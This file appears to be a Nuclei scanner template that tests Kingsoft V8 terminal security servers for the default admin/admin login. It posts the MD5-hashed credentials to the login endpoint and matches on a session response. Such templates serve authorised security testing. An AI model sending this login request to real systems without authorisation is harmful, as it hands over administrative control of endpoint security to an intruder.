id: poc-yaml-kingsoft-v8-default-password

info:
  name: poc-yaml-kingsoft-v8-default-password
  author: B1anda0(https://github.com/B1anda0)
  severity: high
  tags: xray-converted,ct-158349
  reference:
    - https://github.com/Ershu1/2021_Hvv/blob/main/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F_%E5%BC%B1%E5%8F%A3%E4%BB%A4.md

http:
  - raw:
      - |
        POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "ADMIN"
          - "userSession"